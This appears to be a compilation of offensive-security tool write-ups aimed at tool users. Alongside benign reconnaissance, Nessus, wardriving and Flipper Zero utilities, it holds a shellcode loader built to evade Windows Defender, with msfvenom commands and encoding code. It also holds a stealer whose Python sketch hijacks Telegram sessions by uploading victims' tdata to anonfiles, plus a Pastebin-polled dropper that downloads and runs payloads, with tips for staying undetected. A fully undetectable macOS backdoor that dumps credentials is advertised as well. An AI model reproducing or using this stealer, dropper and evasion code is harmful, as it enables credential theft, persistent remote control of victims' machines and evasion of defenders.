To compile the backdoor I used Visual Studio 2022; you will also need to install DllExport (via NuGet or any other way) to compile it. You can compile it either with USE_SHELLCODE defined, to use Orca's shellcode, or without USE_SHELLCODE to use WebClient.

IOCs

  • A shellcode is injected into RuntimeBroker.

  • Suspicious NTP communication starts with a known magic header.

  • YARA rule.

Contributing

Thanks to those who have already contributed! I'll happily accept more contributions; make a pull request and I will review it.



xnLinkFinder - A Python Tool Used To Discover Endpoints (And Potential Parameters) For A Given Target

About - v2.0

This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:

  • crawling a target (pass a domain/URL)
  • crawling multiple targets (pass a file of domains/URLs)
  • searching files in a given directory (pass a directory name)
  • getting them from a Burp project (pass the location of a Burp XML file)
  • getting them from an OWASP ZAP project (pass the location of a ZAP ASCII message file)

The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.


Installation

xnLinkFinder supports Python 3.

$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install

Usage

Arg Long Arg Description
-i --input Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file.
-o --output The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed.
-op --output-params The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed.
-ow --output-overwrite If the output file already exists, it will be overwritten instead of being appended to.
-sp --scope-prefix Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-spo --scope-prefix-original If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false)
-sf --scope-filter Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-c --cookies † Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
-H --headers † Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
-ra --regex-after RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output.
-d --depth † The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix) argument to ensure a request to links found without a domain can be attempted.
-p --processes † Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25)
-x --exclude Additional Link exclusions (to the list in config.yml) in a comma separated list, e.g. careers,forum
-orig --origin Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false)
-t --timeout † How many seconds to wait for the server to send data before giving up (default: 10 seconds)
-inc --include Include input (-i) links in the output (default: false)
-u --user-agent † What User Agents to get links for, e.g. -u desktop mobile
-insecure Whether TLS certificate checks should be disabled when making requests (default: false)
-s429 Stop when > 95 percent of responses return 429 Too Many Requests (default: false)
-s403 Stop when > 95 percent of responses return 403 Forbidden (default: false)
-sTO Stop when > 95 percent of requests time out (default: false)
-sCE Stop when > 95 percent of requests have connection errors (default: false)
-m --memory-threshold The memory threshold percentage. If the machine's memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95)
-mfs --max-file-size † The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size is over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size.
-replay-proxy For active link finding with URL (or file of URLs), replay the requests through this proxy.
-ascii-only Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason.
-v --verbose Verbose output
-vv --vverbose Increased verbose output
-h --help show the help message and exit

† NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE

config.yml

The config.yml file has the keys which can be updated to suit your needs:

  • linkExclude - A comma separated list of strings (e.g. .css,.jpg,.jpeg etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.
  • contentExclude - A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg etc.) that all responses' Content-Type headers are checked against. Any responses with these content types will be excluded and not checked for links.
  • fileExtExclude - A comma separated list of strings (e.g. .zip,.gz,.tar etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.
  • regexFiles - A list of file types separated by a pipe character (e.g. php|php3|php5 etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
  • respParamLinksFound † - Whether to get potential parameters from links found in responses: True or False
  • respParamPathWords † - Whether to add path words in retrieved links as potential parameters: True or False
  • respParamJSON † - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True or False
  • respParamJSVars † - Whether javascript variables set with var, let or const are added as potential parameters: True or False
  • respParamXML † - If the MIME type of the response contains XML, whether to add XML attributes values as potential parameters: True or False
  • respParamInputField † - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True or False
  • respParamMetaName † - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True or False

† IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True

Examples

Find Links from a specific target - Basic

python3 xnLinkFinder.py -i target.com

Find Links from a specific target - Detailed

Ideally, provide a scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results to relevant domains only (this can be a file or an in-scope domain). You can also pass cookies and custom headers to ensure you find links only available to authorised users. Specifying the User Agent (-u desktop mobile) will first search for all links using desktop User Agents, and then try again using mobile user agents; there could be specific endpoints that are related to the user agent given. Giving a depth value (-d) will keep sending requests to links found on the previous depth search to find more links.

python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10

Find Links from a list of URLs - Basic

If you have a file of JS file URLs for example, you can look for links in those:

python3 xnLinkFinder.py -i target_js.txt

Find Links from files in a directory - Basic

If you have files, e.g. JS files, HTTP responses, etc., you can look for links in those:

python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com

NOTE: Sub directories are also checked. The -mfs option can be specified to skip files over a certain size.

Find Links from a Burp project - Basic

In Burp, select the items you want to search (by highlighting the scope, for example), right click and choose 'Save selected items'. Ensure the 'base64-encode requests and responses' option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_burp.xml

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i starts with <?xml then you are trying to process a Burp file.

Find Links from a Burp project - Detailed

Ideally, provide scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains.

python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv

Find Links from an OWASP ZAP project - Basic

In ZAP, select the items you want to search by highlighting the History for example, clicking menu Report and selecting Export Messages to File.... This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_zap.txt

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i is in the format ==== 99 ========== for example, then you are trying to process an OWASP ZAP ASCII text file.

Piping to other Tools

You can pipe xnLinkFinder to other tools. Any errors are sent to stderr and any links found are sent to stdout. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:

python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf redbull.* -d 3 | unfurl keys | sort -u

You can also pass the input through stdin instead of -i.

cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf redbull.* -d 3

NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i.

Recommendations and Notes

  • Always use the Scope Prefix argument -sp. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http):
    http://www.target.com
    https://target-payments.com
    https://static.target-cdn.com
    If a link is found that has no domain, e.g. /path/to/example.js, then passing -sp http://www.target.com will result in the output http://www.target.com/path/to/example.js, and if Depth (-d) is >1 then a request can be made to that URL to search for more links. If a file of domains is passed using -sp then the output will include each domain followed by /path/to/example.js, increasing the chance of finding more links.
  • If you use -sp but still want the original link of /path/to/example.js (without a domain) additionally returned in the output, then pass the argument -spo.
  • Always use the Scope Filter argument -sf. This will ensure that only relevant domains are returned in the output, and more importantly if Depth (-d) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included):
    target.*
    target-payments.com
    static.target-cdn.com
    THIS IS FOR FILTERING THE LINKS DOMAIN ONLY.
  • If you want to filter the final output in any way, use -ra. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.
  • Use the -v option to have a better idea of what the tool is doing.
  • If you have problems, use the -vv option which may show errors that are occurring, which can possibly be resolved, or you can raise as an issue on github.
  • Pass cookies (-c), headers (-H) and regex (-ra) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
  • Set the -o option to give a specific output file name for Links, rather than the default of output.txt. If you plan on running a large depth of searches, start with 2 with option -v to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow.
  • Set the -op option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt. Any output will be appended to the existing file, unless you pass -ow.
  • If using a high Depth (-d), be wary of sites using dynamic links, as the tool will just keep finding new ones. If no new links are being found, then xnLinkFinder will stop searching. Providing the stop flags (s429, s403, sTO, sCE) should also be considered.
  • If you are finding a large number of links (especially if the Depth (-d) value is high) and have limited resources, the program will stop when it reaches the memory threshold (-m) value and end gracefully with data intact before getting killed.
  • If you decide to cancel xnLinkFinder (using Ctrl-C) in the middle of running, be patient and any gathered data will be saved before ending gracefully.
  • Using the -orig option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but each will be suffixed with the origin URL in square brackets.
  • When making requests, xnLinkFinder will use a random User-Agent from the current group, which defaults to desktop. If you have a target that could return different links for different user agent groups, then specify -u desktop mobile, for example (separated with a space). The mobile user agent option is a combination of mobile-apple, mobile-android and mobile-windows.
  • When -i has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs (default: 500 MB) will be skipped.
  • When using the -replay-proxy option, sometimes requests can take longer. If you start seeing more Request Timeout errors (you'll see errors if you use -v or -vv options) then consider using -t to raise the timeout limit.
  • If you know a target will only have ASCII characters in links and parameters then consider passing -ascii-only. This can eliminate a number of false positives that can sometimes get returned from binary data.

Issues

If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv to reproduce the problem and let me know about any error messages that are given.

TODO

  • I seem to have completed all the TODO's I originally had! If you think of any that need adding, let me know

Example output

Active link finding for a domain:

...

Piped input and output:

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)

/XNL-h4ck3r


FUD-UUID-Shellcode - Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness


Introduction

Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).


How it works

Shellcode generation

  • Firstly, generate a payload in binary format (using either CobaltStrike or msfvenom); for instance, in msfvenom you can do it like so (the payload I'm using is for illustration purposes, you can use whatever payload you want):

    msfvenom -p windows/messagebox  -f raw -o shellcode.bin
  • Then convert the shellcode (in binary/raw format) into a UUID string format using the Python3 script bin_to_uuid.py:

    ./bin_to_uuid.py -p shellcode.bin > uuid.txt
  • XOR-encrypt the UUID strings in uuid.txt using the Python3 script xor_encryptor.py:

    ./xor_encryptor.py uuid.txt > xor_crypted_out.txt
  • Copy the C-style array in the file xor_crypted_out.txt and paste it into the C++ file as an array of unsigned char, i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt} (a sketch of the UUID conversion step follows)
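
A minimal Python sketch of that binary-to-UUID step (the repo's bin_to_uuid.py may differ): each 16-byte chunk of shellcode becomes one UUID string, and bytes_le matches the little-endian field layout that Windows' UuidFromStringA later writes back into memory.

import sys
import uuid

def bin_to_uuids(data: bytes) -> list:
    if len(data) % 16:
        data += b"\x90" * (16 - len(data) % 16)  # pad final chunk with NOPs
    return [str(uuid.UUID(bytes_le=data[i:i + 16]))
            for i in range(0, len(data), 16)]

with open(sys.argv[1], "rb") as f:  # e.g. shellcode.bin
    for u in bin_to_uuids(f.read()):
        print(u)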

Execution

This shellcode injection technique comprises the following steps:

  • First things first, it allocates virtual memory for payload execution and residence via VirtualAlloc
  • It XOR-decrypts the payload using the XOR key value
  • It uses UuidFromStringA to convert the UUID strings into their binary representation and store them in the previously allocated memory. This avoids the use of suspicious APIs like WriteProcessMemory or memcpy.
  • It uses EnumChildWindows to execute the payload previously loaded into memory (in step 1)

What makes it unique?

  • It doesn't use standard functions like memcpy or WriteProcessMemory, which are known to raise alarms for AVs/EDRs. Instead, this program uses the Windows API function UuidFromStringA, which can be used to decode data as well as write it to memory (isn't that great, folks? And please don't say "NO!" :) ).
  • It uses the function call obfuscation trick to call the Windows API functions
  • Lastly, because it looks unique :) ( Isn't it? :) )

Important

  • You have to change the XOR key (line 86) to what you wish. This can be done in the ./xor_encryptor.py Python3 script by changing the KEY variable.
  • You have to change the default executable filename value (line 90) to your filename.
  • The command for compiling is provided in the C++ file (around the top). NB: MinGW was used, but you can use whichever compiler you prefer. :)

Compile

make

Proof-of-Concept( PoC )

Static Analysis

AV Scan results

The binary was scanned using antiscan.me on 01/08/2022.

Credits

https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/



SteaLinG - Open-Source Penetration Testing Framework Designed For Social Engineering


SteaLinG is an open-source penetration testing framework designed for social engineering. After the hack, you can upload it to the victim's device and run it.

Disclaimer:

This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes

How can I benefit from this project?

  • you can simply use it as a tool
  • for developers: you can read the source code and try to understand how to make a project like this

Features


Module - Short description
Dump passwords - Steals all saved passwords and uploads the saved-passwords file to Mega
Dump history - Dumps browser history
Dump files - Steals files from the hard drive with the extension you want

New features

Module - Short description
1 - Telegram Session Hijack - Telegram session hijacker

  • How does it work? Telegram stores its session locally in this particular path, C:\Users\<pc name>\AppData\Roaming\Telegram Desktop, in the 'tdata' folder:

C:
└── Users
    └── <pc name>
        └── AppData
            └── Roaming
                └── Telegram Desktop
                    └── tdata

Once this folder, with all its contents, is moved to the same path on another device, the session is simply taken over. The tool does all of this; all you have to do is give it your token from https://anonfiles.com/. The first step is to go to the path where the tdata folder is located and convert it to a zip file. If Telegram is running this step would fail, so on any error the tool kills the Telegram processes first. Antivirus software would see process killing as malicious behavior, so that part is wrapped in try/except in the code to avoid detection. The archive file is named after your victim's device (useful if you have more than one victim). The tool then POSTs the zip file to the anonfiles website using the API key (token) of your account on the site. Just that, and it is not flagged by any AV. A condensed sketch of this flow follows.
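
A condensed Python sketch of that flow (not SteaLinG's actual code; the anonfiles API endpoint shown is an assumption, and the service has since shut down):

import os
import platform
import shutil
import subprocess
import requests

TOKEN = "YOUR_ANONFILES_TOKEN"  # token from your anonfiles account
tdata = os.path.expandvars(r"%APPDATA%\Telegram Desktop\tdata")

try:
    # Telegram must not be running while its folder is zipped
    subprocess.run(["taskkill", "/f", "/im", "Telegram.exe"], check=True)
except Exception:
    pass  # swallow errors quietly, as described above

# Archive named after the victim's device (its hostname)
archive = shutil.make_archive(platform.node(), "zip", tdata)
with open(archive, "rb") as f:
    r = requests.post(f"https://api.anonfiles.com/upload?token={TOKEN}",
                      files={"file": f}, timeout=60)
print(r.json())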

Module - Short description
2 - Dropper

  • What does it require from you? The first thing it asks for is the URL of the virus (or whatever you want downloaded to the victim's device). Keep in mind that the URL must be direct, i.e. it must end with the file name, such as something.exe or something.png. The second thing it asks for is your Pastebin API key: register on the site, click on 'API', and you will find it, along with your username and password.
  • And how does it work? It first creates a private paste on the site containing the URL you gave it, then gives you the exe file. When that exe runs on any device, it adds itself to the device's registry in two different ways, then opens the private paste you created, takes the URL from it, downloads its content and runs it. You can enter a new URL at any time; the dropper checks the paste every 10 minutes, and if the URL has changed it downloads and runs the new content. So, literally every 10 minutes, you can reach your victim's device from anywhere, as sketched below.
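
A sketch of that polling loop (illustrative only, not the actual dropper; the paste URL is a placeholder):

import subprocess
import tempfile
import time
import requests

PASTE_RAW = "https://pastebin.com/raw/XXXXXXXX"  # placeholder paste ID
last = None

while True:
    # Fetch the private paste's raw content: a single direct URL
    url = requests.get(PASTE_RAW, timeout=10).text.strip()
    if url and url != last:
        last = url
        payload = requests.get(url, timeout=30).content
        path = tempfile.mktemp(suffix=".exe")
        with open(path, "wb") as f:
            f.write(payload)
        subprocess.Popen([path])  # run the downloaded content
    time.sleep(600)  # re-check every 10 minutes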

3- Linux support

4-You can now choose between Mega or Pastebin

Requirements

  • python >= 3.8 (Download Python)
  • os : Windows
  • os : Linux

Installation on Windows:

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py

Installation on Linux

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py

warning:

* Don't upload it to VirusTotal.com, because then this tool will not stay undetected for long.
* VirusTotal shares signatures with AV companies.
* Again, don't be an idiot!

AV detection


Media



Utkuici - Nessus Automation


Today, with the spread of information technology systems, investments in the field of cyber security have increased to a great extent. Vulnerability management, penetration tests and various analyses are carried out to accurately determine how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader in vulnerability management tools, an IP address that has just joined the corporate network, a newly opened port, or an exploitable vulnerability can be identified. This Python application integrates with Tenable Nessus to identify these events automatically.


Features

  • Finding New IP Address
  • Finding New Port
  • Finding New Exploitable Vulnerability

Installation

git clone https://github.com/anil-yelken/Nessus-Automation
cd Nessus-Automation
sudo pip3 install -r requirements.txt

Usage

The SIEM IP address in the code should be changed.

To detect a new IP address reliably, the script checks whether the phrase "Host Discovery" is used in the Nessus scan name; live IP addresses are recorded in the database with a timestamp, and any new IP address is sent to SIEM. The contents of the hosts table look as follows:

Usage: python finding-new-ip-nessus.py

By checking the port scans made by Nessus, port-IP-timestamp information is recorded in the database; the script detects a newly opened service via the database and transmits the data to SIEM in the form "New Port:" port-IP-timestamp. The result observed by SIEM is as follows:

Usage: python finding-new-port-nessus.py

Among the findings of vulnerability scans made in institutions and organizations, exploitable vulnerabilities should be closed first. The script records vulnerabilities that can be exploited with Metasploit in the database, and transmits this information to SIEM when it finds a new exploitable vulnerability on the systems. Exploitable vulnerabilities observed by SIEM:

Usage: python finding-exploitable-service-nessus.py
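
All three scripts share the same record-diff-alert pattern. A minimal sketch of that pattern (not the repository's actual code), keeping seen items in SQLite and forwarding anything new to the SIEM as a UDP syslog-style message:

import socket
import sqlite3
import time

SIEM_IP, SIEM_PORT = "10.0.0.5", 514  # change to your SIEM address

db = sqlite3.connect("nessus.db")
db.execute("CREATE TABLE IF NOT EXISTS hosts (ip TEXT PRIMARY KEY, ts TEXT)")

def report_new(ip: str):
    if db.execute("SELECT 1 FROM hosts WHERE ip = ?", (ip,)).fetchone():
        return  # already known, nothing to report
    db.execute("INSERT INTO hosts VALUES (?, ?)", (ip, time.ctime()))
    db.commit()
    msg = f"New IP: {ip}".encode()
    socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(
        msg, (SIEM_IP, SIEM_PORT))

for ip in ["192.168.1.23", "192.168.1.42"]:  # would come from Nessus results
    report_new(ip)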

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Bayanay - Python Wardriving Tool


WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.

Features

Wardriving is done by combining the SSID information obtained with scapy with location information obtained via the HTML5 geolocation feature.


Usage

I cannot be held responsible for malicious use of this tool.

ssidBul.py has been tested with a TP-LINK TL-WN722N.

Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. The Firefox geckodriver is located in the same directory as the code.

SSID and MAC names and location information were created and changed in the test environment.

ssidBul.py and location.py must be run concurrently.
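
For reference, the beacon-sniffing side can be sketched with scapy as below (illustrative, not ssidBul.py itself), emitting pipe-delimited records like the samples that follow. It assumes a wireless interface in monitor mode (e.g. wlan0mon) and root privileges:

from datetime import datetime
from scapy.all import sniff, Dot11, Dot11Beacon, Dot11Elt

def handle(pkt):
    if pkt.haslayer(Dot11Beacon):
        mac = pkt[Dot11].addr2  # the AP's MAC address
        ssid = pkt[Dot11Elt].info.decode(errors="ignore")
        ts = datetime.now().strftime("%d %B %Y %I:%M%p")
        print(f"{ts}|{mac}|{ssid}")

sniff(iface="wlan0mon", prn=handle, store=False)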

ssidBul.py result:

20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Here is a screenshot of allowing location information while running location.py:

The screenshot of the location information is as follows:

konum.py result:

lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

After the data collection processes, the following output is obtained as a result of running wardriving.py:

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



pyFlipper - Unofficial Flipper Zero CLI Wrapper Written In Python


Unofficial Flipper Zero CLI wrapper written in Python

Functions and characteristics:

  • Flipper serial CLI wrapper
  • Websocket client interface

Setup instructions:

$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Tested on:

  • Python 3.8.10 on Linux 5.4.0 x86_64
  • Python 3.10.5 on Android 12 (Termux + OTGSerial2WebSocket NO ROOT REQUIRED)

Usage/Examples

Connection

from pyflipper import PyFlipper

#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")

#OR

#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")

Power

#Info
info = flipper.power.info()

#Poweroff
flipper.power.off()

#Reboot
flipper.power.reboot()

#Reboot in DFU mode
flipper.power.reboot2dfu()

Update/Backup

#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")

#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")

#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")

Loader

#List installed apps
apps = flipper.loader.list()

#Open app
flipper.loader.open(app_name="Clock")

Flipper Info

#Get flipper date
date = flipper.date.date()

#Get flipper timestamp
timestamp = flipper.date.timestamp()

#Get the processes dict list
ps = flipper.ps.list()

#Get device info dict
device_info = flipper.device_info.info()

#Get heap info dict
heap = flipper.free.info()

#Get free_blocks string
free_blocks = flipper.free.blocks()

#Get bluetooth info
bt_info = flipper.bt.info()

Storage

Filesystem Info

#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")

Explorer

#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")

#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")

#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")

#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")

Files

#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")

#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")

#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")

#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")

#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")

#Write file in one chunk
file = "/ext/bar.txt"

text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.file(file, text)

#Write file using a listener
file = "/ext/foo.txt"

text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.start(file)

time.sleep(2)

flipper.storage.write.send(text_one)

text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)

time.sleep(3)

#Don't forget to stop
flipper.storage.write.stop()

LED/Backlight

#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)

#Set blue led off
flipper.led.blue(value=0)

#Set green led value
flipper.led.green(value=175)

#Set backlight on
flipper.led.backlight_on()

#Set backlight off
flipper.led.backlight_off()

#Turn off led
flipper.led.off()

Vibro

#Set vibro True or False
flipper.vibro.set(True)

#Set vibro on
flipper.vibro.on()

#Set vibro off
flipper.vibro.off()

GPIO

#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)

#Set gpio pin value
flipper.gpio.set(pin_name=PIN_NAME, value=1)

MusicPlayer

#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"

#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)

#Stop loop
flipper.music_player.stop()

#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)

#Beep
flipper.music_player.beep()

#Beep for 5 seconds
flipper.music_player.beep(duration=5)

NFC

#Synchronous default timeout 5 seconds

#Detect NFC
nfc_detected = flipper.nfc.detect()

#Emulate NFC
flipper.nfc.emulate()

#Activate field
flipper.nfc.field()

RFID

#Synchronous default timeout 5 seconds

#Read RFID
rfid = flipper.rfid.read()

SubGhz

#Transmit hex_key N times (default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)

#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")

Infrared

#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")

#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])

#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)

IKEY

#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()

#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFC000FFEE")

#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFC000FFEE")

Log

#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()

Debug

#Activate debug mode
flipper.debug.on()

#Deactivate debug mode
flipper.debug.off()

Onewire

#Search
response = flipper.onewire.search()

I2C

#Get
response = flipper.i2c.get()

Input

#Input dump
dump = flipper.input.dump()

#Send input
flipper.input.send("up", "press")

Optimizations

Feel free to contribute in any way

  • Queue Thread orchestrator (check dev branch)
  • Implement all the cli functions
  • Async SubGhz Chat (check dev branch)

License

MIT

Buy me a pint

ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7

ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54

BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat

Contacts

  • Discord: white_rabbit#4124
  • Twitter: @nic_whr
  • GPG: 0x94EDEADC


OSRipper - AV Evading OSX Backdoor And Crypter Framework


OSripper is a fully undetectable backdoor generator and crypter which specialises in macOS M1 malware. It will also run on Windows, but for now Windows is unsupported, it is NOT FUD for Windows (yet, at least), and Windows will not be a focus.

You can also PM me on discord for support or to ask for new features SubGlitch1#2983


Features

  • FUD (for macOS)
  • Cloaks as an official app (Microsoft, ExpressVPN, etc.)
  • Dumps: system info, browser history, logins, ssh/aws/azure/gcloud creds, clipboard contents, local users, etc. (see Cedric Owens' SwiftBelt)
  • Encrypted communications
  • Rootkit-like Behaviour
  • Every Backdoor generated is entirely unique

Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper




macOS .apps will look like this on VT

Getting Started

Dependencies
